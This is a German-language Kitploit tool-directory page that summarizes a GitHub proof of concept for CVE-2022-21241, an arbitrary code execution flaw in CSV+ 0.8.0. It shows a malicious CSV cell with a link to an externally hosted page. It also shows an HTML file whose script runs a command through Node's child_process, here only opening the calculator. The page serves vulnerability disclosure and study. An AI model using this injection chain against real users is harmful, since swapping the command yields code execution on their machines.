Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
csv-plus_vulnerability — 👻 [PoC] CSV+ 0.8.0 - Beliebige Codeausführung (CVE-2022-21241) | Kitploit
Tools/GitHubGitHub/nanaao/csv-plus_vulnerability
Payload-GenerierungSchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationLernen & Bildung
GitHubnanaao/csv-plus_vulnerability

csv-plus_vulnerability

👻 [PoC] CSV+ 0.8.0 - Beliebige Codeausführung (CVE-2022-21241)

Repository anzeigen
5vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

csv-plus_vulnerability

👻 2-Klick-Schwachstelle zur Ausführung beliebigen Codes.

PoC.gif

CVE-2022-21241

⚠
Dieser PoC wurde erstellt, um Benutzer zu warnen und Schwachstellen in ihrer eigenen CSV+ zu untersuchen. Die Nutzung für Angriffe ist untersagt.

Schwachstelle

Die folgenden Versionen sind betroffen.

  • CSV+ <= 0.8.0

Angreifer können mithilfe der Node.js-Funktionalität beliebigen Code ausführen. Sie platzieren den bösartigen JavaScript-Code auf einer Website und verlinken ihn über a-Tags mithilfe der HTML-Injection-Schwachstelle in CSV+.

PoC

scenario.png

Bösartige CSV-Datei

root@kitploit:~
<a href='https://electronooooo.htmlbin.net/xsscalc.html'>click me 👻</a>

https://electronooooo.htmlbin.net/xsscalc.html ist ein temporärer Link.

Bösartige HTML-Datei (calc)

root@kitploit:~
<!DOCTYPE html>
<html>
    <head>
        <script>
            var cmd = "calc";
            require("child_process").exec(cmd);
        </script>
    </head>
    <body>
        Hi :)
    </body>
</html>
Tool herunterladen